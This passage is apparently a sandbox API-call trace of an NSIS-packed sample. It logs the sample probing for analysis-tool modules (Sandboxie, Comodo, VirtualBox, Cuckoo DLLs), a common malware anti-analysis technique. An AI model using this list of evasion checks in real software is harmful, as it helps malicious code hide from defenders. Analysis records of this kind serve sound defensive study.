| out: lpString1="Call") returned="Call" [0157.959] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.959] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.959] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.960] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.960] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.960] lstrcpynA (in: lpString1=0x323058, lpString2="SbieDll.dll", iMaxLength=1024 | out: lpString1="SbieDll.dll") returned="SbieDll.dll" [0157.960] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.960] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.960] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.960] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.960] lstrcpynA (in: lpString1=0x3217a0, lpString2="SbieDll.dll", iMaxLength=1024 | out: lpString1="SbieDll.dll") returned="SbieDll.dll" [0157.960] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.960] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0157.960] lstrcpynA (in: lpString1=0x314418, lpString2="SbieDll.dll", iMaxLength=1024 | out: lpString1="SbieDll.dll") returned="SbieDll.dll" [0157.960] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.960] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.960] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.960] lstrlenA (lpString="0") returned 1 [0157.960] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.960] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.960] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.961] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.961] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.961] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.961] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.961] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.961] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.961] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.961] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.961] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0") returned="kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0" [0157.961] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.961] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.961] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.961] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.961] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.961] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.962] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.962] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.962] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.962] lstrcpynA (in: lpString1=0x323058, lpString2="dir_watch.dll", iMaxLength=1024 | out: lpString1="dir_watch.dll") returned="dir_watch.dll" [0157.962] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.962] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.962] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.962] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.962] lstrcpynA (in: lpString1=0x3217a0, lpString2="dir_watch.dll", iMaxLength=1024 | out: lpString1="dir_watch.dll") returned="dir_watch.dll" [0157.962] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.962] GetModuleHandleA (lpModuleName="dir_watch.dll") returned 0x0 [0157.962] lstrcpynA (in: lpString1=0x314418, lpString2="dir_watch.dll", iMaxLength=1024 | out: lpString1="dir_watch.dll") returned="dir_watch.dll" [0157.962] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.962] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.962] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.962] lstrlenA (lpString="0") returned 1 [0157.962] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.963] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.963] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.963] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.963] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.963] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.963] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.963] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.963] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0") returned="kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0" [0157.963] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.963] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.963] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.963] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.964] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.964] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.964] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.964] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.964] lstrcpynA (in: lpString1=0x323058, lpString2="cmdvrt32.dll", iMaxLength=1024 | out: lpString1="cmdvrt32.dll") returned="cmdvrt32.dll" [0157.964] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.964] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.964] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.964] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.964] lstrcpynA (in: lpString1=0x3217a0, lpString2="cmdvrt32.dll", iMaxLength=1024 | out: lpString1="cmdvrt32.dll") returned="cmdvrt32.dll" [0157.964] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.964] GetModuleHandleA (lpModuleName="cmdvrt32.dll") returned 0x0 [0157.964] lstrcpynA (in: lpString1=0x314418, lpString2="cmdvrt32.dll", iMaxLength=1024 | out: lpString1="cmdvrt32.dll") returned="cmdvrt32.dll" [0157.964] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.964] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.965] lstrlenA (lpString="0") returned 1 [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.965] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.965] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.965] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.965] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.965] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.965] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.965] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0") returned="kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0" [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.965] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.966] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.966] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.966] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.966] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.966] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.966] lstrcpyA (in: lpString1=0x321fb0, lpString2="LoadLibrary" | out: lpString1="LoadLibrary") returned="LoadLibrary" [0157.966] lstrcpynA (in: lpString1=0x323058, lpString2="VBoxHook.dll", iMaxLength=1024 | out: lpString1="VBoxHook.dll") returned="VBoxHook.dll" [0157.966] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.966] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibrary") returned 0x0 [0157.966] lstrlenA (lpString="LoadLibrary") returned 11 [0157.966] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryA") returned 0x75ca49d7 [0157.966] lstrcpynA (in: lpString1=0x3217a0, lpString2="VBoxHook.dll", iMaxLength=1024 | out: lpString1="VBoxHook.dll") returned="VBoxHook.dll" [0157.966] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.966] LoadLibraryA (lpLibFileName="VBoxHook.dll") returned 0x0 [0157.987] lstrcpynA (in: lpString1=0x314418, lpString2="VBoxHook.dll", iMaxLength=1024 | out: lpString1="VBoxHook.dll") returned="VBoxHook.dll" [0157.988] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.988] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.988] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.988] lstrlenA (lpString="0") returned 1 [0157.988] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.988] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.988] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.988] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.988] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.988] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.988] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.988] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.988] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.989] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.989] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.989] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0") returned="kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0" [0157.989] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.989] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.989] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.989] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.990] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.990] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.990] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.990] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.990] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.990] lstrcpynA (in: lpString1=0x323058, lpString2="cuckoomon.dll", iMaxLength=1024 | out: lpString1="cuckoomon.dll") returned="cuckoomon.dll" [0157.990] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.990] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.990] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.991] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.991] lstrcpynA (in: lpString1=0x3217a0, lpString2="cuckoomon.dll", iMaxLength=1024 | out: lpString1="cuckoomon.dll") returned="cuckoomon.dll" [0157.991] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.991] GetModuleHandleA (lpModuleName="cuckoomon.dll") returned 0x0 [0157.991] lstrcpynA (in: lpString1=0x314418, lpString2="cuckoomon.dll", iMaxLength=1024 | out: lpString1="cuckoomon.dll") returned="cuckoomon.dll" [0157.991] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.991] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.991] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.991] lstrlenA (lpString="0") returned 1 [0157.991] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.991] lstrlenA (lpString="FALSE") returned 5 [0157.991] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.991] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.992] lstrlenA (lpString="FALSE") returned 5 [0157.992] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.992] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.992] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrlenA (lpString="") returned 0 [0157.992] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrlenA (lpString="") returned 0 [0157.992] lstrcpynA (in: lpString1=0x31441c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrlenA (lpString="") returned 0 [0157.992] lstrcpynA (in: lpString1=0x31482c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.993] lstrlenA 